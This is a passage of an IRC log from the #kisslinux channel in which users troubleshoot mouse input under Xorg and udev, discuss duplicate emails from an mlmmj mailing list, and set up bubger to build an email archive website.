terminals by clicking in sowm but i wasn't able to move the pointer 2021-04-13T21:48:37 #kisslinux i would try a couple reboots and see whether they're consistently wrong or not. if still wonky, then sure try a different udev 2021-04-13T21:49:43 #kisslinux acheam: still not sure what you mean by "kiedtl is abusing drewlang" 2021-04-13T21:50:10 #kisslinux oh just by making a huge array 2021-04-13T21:50:19 #kisslinux you hadn't explained why when you asked your question first 2021-04-13T21:50:23 #kisslinux so it seemed a little bit absurd 2021-04-13T21:50:44 #kisslinux ie; you were actively pushing the limits of it 2021-04-13T21:54:27 #kisslinux i should probably change the udev rules to MODE=660 2021-04-13T21:54:42 #kisslinux for my usb devices i need 2021-04-13T21:56:10 #kisslinux but what i cant explain is why i can see input when catting /dev/input/mouse2 2021-04-13T21:56:24 #kisslinux which means the issue is xorg as user only 2021-04-13T21:57:10 #kisslinux re drewlang: ah lol 2021-04-13T21:58:05 #kisslinux gotta go to sleep now, it's quite late i'll try to fix it tomorrow 2021-04-13T21:58:06 #kisslinux gn 2021-04-13T22:02:07 #kisslinux I wasn't exactly expecting the IRC experience on the mailing list 2021-04-13T22:02:19 #kisslinux INDEED 2021-04-13T22:02:34 #kisslinux it will be more calm when I don't say 'feel free to literally annihilate my inbox' 2021-04-13T22:02:56 #kisslinux Yup 2021-04-13T22:03:03 #kisslinux lol 2021-04-13T22:03:10 #kisslinux just > reply > to > the > list > *notes* 2021-04-13T22:03:14 #kisslinux merakor2: is ckyln.com purposefully blank? 2021-04-13T22:03:27 #kisslinux 'this webpage intentionally left unscrapeable' 2021-04-13T22:03:52 #kisslinux i'm gettting lots of doubled emails :/ 2021-04-13T22:04:31 #kisslinux I mean, I happen to have two separate domains, and my personal website is on cemkeylan.com 2021-04-13T22:04:53 #kisslinux ik, I just figured that it was weird it had a title, and then under it just blank 2021-04-13T22:04:53 #kisslinux So not exactly purposefully 2021-04-13T22:04:59 #kisslinux its a pretty empty archive 2021-04-13T22:05:25 #kisslinux It has a title? 2021-04-13T22:05:38 #kisslinux "This is an archive of my pushed patches and whatnot" 2021-04-13T22:05:54 #kisslinux Oh yeah 2021-04-13T22:06:04 #kisslinux Now I remember 2021-04-13T22:06:19 #kisslinux It is not a browsable archive 2021-04-13T22:06:25 #kisslinux It's my pastebin 2021-04-13T22:06:29 #kisslinux ah 2021-04-13T22:07:25 #kisslinux Archive is definitely the wrong word, I forgot that site existed 2021-04-13T22:07:30 #kisslinux heh 2021-04-13T22:07:49 #kisslinux i'm copying your "this page in plaintext" by the way 2021-04-13T22:07:53 #kisslinux hope you don't mind 2021-04-13T22:08:33 #kisslinux Yeah, go ahead 2021-04-13T22:08:53 #kisslinux imagine copyrighting that 2021-04-13T22:11:05 #kisslinux Hey that's eula 2021-04-13T22:11:51 #kisslinux By copying that, you agree to install a keylogger to your pc and sending all logs to me 2021-04-13T22:12:18 #kisslinux sounds like oracle 2021-04-13T22:13:05 #kisslinux Lol 2021-04-13T22:36:00 #kisslinux heyo, I have basically figured out how to work bubger. Amazing. 2021-04-13T22:36:06 #kisslinux now just to decide how to do this... 2021-04-13T22:36:29 #kisslinux yay 2021-04-13T22:36:36 #kisslinux wait why no reply all 2021-04-13T22:36:46 #kisslinux isn't that... how you do mailing lists? 2021-04-13T22:37:48 #kisslinux dilyn: ......... 2021-04-13T22:37:49 #kisslinux https://i.imgur.com/o1Z9kN0.png 2021-04-13T22:38:53 #kisslinux sometimes it do that 2021-04-13T22:38:55 #kisslinux idk why 2021-04-13T22:39:15 #kisslinux ..... 2021-04-13T22:39:18 #kisslinux What's bubger? The interwebs search just shows burger king results 2021-04-13T22:39:22 #kisslinux lol 2021-04-13T22:39:32 #kisslinux static site generator for email 2021-04-13T22:39:37 #kisslinux https://git.causal.agency/bubger 2021-04-13T22:39:46 #kisslinux written by a genius 2021-04-13T22:40:05 #kisslinux haha, cool thanks 2021-04-13T22:40:19 #kisslinux if mlmmj were smarter, I think it's 'mailman' like features would be better 2021-04-13T22:40:36 #kisslinux there's a tunable that allegedly lets you specify to not send an email to a person twice, but... 2021-04-13T22:40:45 #kisslinux maybe i just need to reread the page on that. 2021-04-13T22:41:49 #kisslinux I would try and fix it 2021-04-13T22:41:57 #kisslinux just so new people don't have to be told not to reply all 2021-04-13T22:41:59 #kisslinux hi riteo 2021-04-13T22:42:00 #kisslinux Hi guys! 2021-04-13T22:42:09 #kisslinux its been some days 2021-04-13T22:46:54 #kisslinux yeah 2021-04-13T22:47:25 #kisslinux hey riteo 2021-04-13T22:47:46 #kisslinux yeah acheam it's definitely going to be my biggest headache. And will make this archive... more difficult. lol 2021-04-13T22:50:12 #kisslinux http://mlmmj.org/docs/tunables/ notmetoo is what we want but... it's in there :X 2021-04-13T22:50:13 #kisslinux hng 2021-04-13T23:23:37 #kisslinux lol 2021-04-13T23:23:47 #kisslinux I feel like I am very responsible for your pain 2021-04-13T23:23:53 #kisslinux and for that, I dearly apologize 2021-04-13T23:33:58 #kisslinux https://archive.k1sslinux.org/ :o 2021-04-13T23:34:54 #kisslinux the dupes in the chains are purely from me receiving my own message a brazillion times lol 2021-04-13T23:34:55 #kisslinux BUT 2021-04-13T23:35:03 #kisslinux itwerks(tm) 2021-04-13T23:41:32 #kisslinux lmao and we can just cutely carry over the git mirror stylesheet to soften up the page 2021-04-13T23:43:13 #kisslinux I think making it propogate to each thread is just as easy as inserting a line into the source too. hot diggity 2021-04-13T23:47:52 #kisslinux woohoo!